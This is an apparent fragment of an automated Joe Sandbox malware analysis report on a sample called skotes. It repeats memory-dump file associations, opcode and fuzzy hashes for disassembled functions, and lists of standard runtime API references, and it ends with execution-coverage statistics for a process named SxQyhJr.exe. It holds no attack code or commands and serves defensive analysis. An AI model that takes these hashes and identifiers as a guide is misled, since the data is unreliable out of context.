Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b59c871dd8afe622c17ab5e878e3903c518121acc237d56f7a80fb08131a395
Instruction ID: 6a7a11a4610d4c84df3d7870b9ef0d73a77a8e9d9a636965f5bdc8ac6eb0bd48
Opcode Fuzzy Hash: 2b59c871dd8afe622c17ab5e878e3903c518121acc237d56f7a80fb08131a395
Instruction Fuzzy Hash: 662261B7F515144BDB4CCB5DDCA27ECB2E3AFD8218B0E803DA40AE3345EA79D9158648

Function 00727049 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13cdb70e9530bc2334a835fe3acecfcaa699ffc739420e1d706b3e6fbe4075e6
Instruction ID: 07ef8f50272742152d6e5691e01deb8c6bdebb6db6ec84fe0985d73fba4e7040
Opcode Fuzzy Hash: 13cdb70e9530bc2334a835fe3acecfcaa699ffc739420e1d706b3e6fbe4075e6
Instruction Fuzzy Hash: B3B16C31614619CFD728CF28D586B657BF0FF45364F258658E89ACF2A2C339E992CB40

Function 006E4B30 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65e2095e5779c8aaba5cee7e6e227484fcdd7d52f451a592c04848e009091cb6
Instruction ID: 521cc5e25f17e07365c03bf7c483304d258b36f3fed1709384d9a6f73457192e
Opcode Fuzzy Hash: 65e2095e5779c8aaba5cee7e6e227484fcdd7d52f451a592c04848e009091cb6
Instruction Fuzzy Hash: 58812374E022958FDB15CF6AD8907EEBBB2BF1A300F1542A9D85097353CB359946CBA0

Function 007278BB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9583a8829c67516652e9242734b9d83d499b8e5fb4d708580aa7af8fbd2e42c2
Instruction ID: 4e7f213c0a256b03aea0030c40858af07bce416016a625c8df49ed17a29cbcbc
Opcode Fuzzy Hash: 9583a8829c67516652e9242734b9d83d499b8e5fb4d708580aa7af8fbd2e42c2
Instruction Fuzzy Hash: 4721B673F2053947770CC47E8C5627DB6E1C78C541745823AE8A6EA2C1D96CD917E2E4

Function 0072779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 573f2f58d0fddaef4ca560a1c0e8d4f2f0b9c943be35eeaf1cff03f9b6a74140
Instruction ID: 4aeae2e05b2719c8c9c16365655da5b7dd96591e8c0a7f48d8699cf59fa07211
Opcode Fuzzy Hash: 573f2f58d0fddaef4ca560a1c0e8d4f2f0b9c943be35eeaf1cff03f9b6a74140
Instruction Fuzzy Hash: 0C118623F30C355B675C816D8C172BAA5D2EBD825071F933AD826E7384E9A4DE23D290

Function 00728860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: 4259ed96965830df44b9fa8d7d6870f7c6f7128e5ad88c1ebf5ee4606594da5c
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: 4A115B772131B243E6C8862DF8B46B7A395EBD53217EC437AC0818B748DE2BE9419602

Function 0071652B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b31bc8f376762b824160189ed9ec7d913e799e6bc79ff5026f0659c74ffd45e0
Instruction ID: 1859d172332687ed6d0146dbcdd0cd3f1d167c04f806df09e16e5800707b9dc1
Opcode Fuzzy Hash: b31bc8f376762b824160189ed9ec7d913e799e6bc79ff5026f0659c74ffd45e0
Instruction Fuzzy Hash: BEE08C30042208AACF357B1CCC19EC93B6AEB52754F005810FD284A26ACB39EED2C690

Function 0071A302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction ID: 65614798bfae2b0edc2266338d973a2cfe459f0f2eb093a826fa700c73299c63
Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
Instruction Fuzzy Hash: CFE08C72922228EBCB14DB9CC908ACAF3ECEB49B00B650096F511D3190C274DE40C7D0

Function 00714840 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00714877
___except_validate_context_record.LIBVCRUNTIME ref: 0071487F
_ValidateLocalCookies.LIBCMT ref: 00714908
__IsNonwritableInCurrentImage.LIBCMT ref: 00714933
_ValidateLocalCookies.LIBCMT ref: 00714988

Strings

S9q, xrefs: 00714925, 0071492E, 0071493F
csm, xrefs: 0071491D

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: S9q$csm
API String ID: 1170836740-3848179163
Opcode ID: 2dc2a6b43870ef1e4d78747cd3b70372f1d8e19e2f4cb1d2d6c0345f2929d9bf
Instruction ID: fe18b1959769c738970c8a61692cd8f730c6e13e66dacb69c875403fd544e588
Opcode Fuzzy Hash: 2dc2a6b43870ef1e4d78747cd3b70372f1d8e19e2f4cb1d2d6c0345f2929d9bf
Instruction Fuzzy Hash: 2951F570A00208DBCF10DF6CD885AEF7BB5AF45324F148055E8189B3D2D73AEA96CB91

Function 006E2EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 006E2F5F
__Mtx_unlock.LIBCPMT ref: 006E2FCC
__Cnd_broadcast.LIBCPMT ref: 006E2FE3
__Mtx_unlock.LIBCPMT ref: 006E30F5
__Mtx_unlock.LIBCPMT ref: 006E319B

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: fdac71da046ee2017944401defdd7ffdb1772833c4f8971e9a3ce9ebcec7c8b1
Instruction ID: 9574cbfe39b6d803d43ba0f6c0612fc4744531b6fbf8a5ec2742a250fc02b148
Opcode Fuzzy Hash: fdac71da046ee2017944401defdd7ffdb1772833c4f8971e9a3ce9ebcec7c8b1
Instruction Fuzzy Hash: D3A1E2B0A027699FDB10DF66C9487AAB7BAFF15320F14812DE915D7341EB31EA04CB91

Function 0071F35F Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 0071F3A3

Strings

`'t, xrefs: 0071F375
8"t, xrefs: 0071F44B
,mq, xrefs: 0071F367, 0071F49B

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: ___free_lconv_mon
String ID: ,mq$8"t$`'t
API String ID: 3903695350-1852597512
Opcode ID: 60ce2b389f49da12eb3d36fe22263baefe31ce5b4cf6cb809d0ce564e2bc408f
Instruction ID: ff62d94e5fb8c4059d0a2757d1411262854991e0157c3a8ee44eea3bb81b3c8c
Opcode Fuzzy Hash: 60ce2b389f49da12eb3d36fe22263baefe31ce5b4cf6cb809d0ce564e2bc408f
Instruction Fuzzy Hash: 50313B31601602EFEB21AA7DE849BDB73E8EF00351F54442AE499D65D9DF78A8C18B11

Function 0071CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0071CC66

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction ID: 4fe5261028570d007f8a59df33639229c2d311660596481636b6430ce6f3792b
Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
Instruction Fuzzy Hash: 34B13832A442959FDB16CFACC8417FEBBE5EF45350F14416AD845EB281D63C9D81CBA0

Function 006FBB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 006FBBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 006FBBE4
_xtime_get.LIBCPMT ref: 006FBC07
__Xtime_diff_to_millis2.LIBCPMT ref: 006FBC13

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Xtime_diff_to_millis2_xtime_get
String ID:
API String ID: 531285432-0
Opcode ID: 9d469d62c2deb51f2cbfc192af6affa0186792f3e3380ad567f6bc75d991015e
Instruction ID: b84184685dd399f86fd5965a51658cabb1e074e16b4a3722a7f1967644b1912f
Opcode Fuzzy Hash: 9d469d62c2deb51f2cbfc192af6affa0186792f3e3380ad567f6bc75d991015e
Instruction Fuzzy Hash: C7215E71A0110DAFDF00EFA4CD819BEB7BAEF09724F504029FA01B72A1DB349D019BA4

Function 006EE360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 006EE4F9

Strings

L1t, xrefs: 006EE394
invalid stoi argument, xrefs: 006EE4F4

Memory Dump Source

Source File: 00000006.00000002.2941024413.00000000006E1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000006.00000002.2940530264.00000000006E0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2941024413.0000000000742000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2942704898.0000000000749000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.000000000074B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000008DB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009E9000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2943303939.00000000009FF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2950753311.0000000000A00000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2953745312.0000000000BA4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2954201170.0000000000BA6000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6e0000_skotes.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: L1t$invalid stoi argument
API String ID: 909987262-1980396506
Opcode ID: 8a916bf5a24fefacfa50349555101703ac7ac4cb2e016af850bb5efbef8a2f0f
Instruction ID: b26ca69f97b0b70dcf88a1f3cc013c2ffdd710e708986862e812ba1365d57321
Opcode Fuzzy Hash: 8a916bf5a24fefacfa50349555101703ac7ac4cb2e016af850bb5efbef8a2f0f
Instruction Fuzzy Hash: D4F02B71501358DBD370DB6C9C0696733E9EB1A710F008436FD1493252EB397900C6E7

Analysis Process: SxQyhJr.exePID: 7396, Parent PID: 2312COMMON

Execution Graph

Execution Coverage:	11.5%
Dynamic/Decrypted Code Coverage:	96.9%
Signature Coverage:	3.5%
Total number of Nodes:	257
Total number of Limit Nodes:	7

Executed Functions

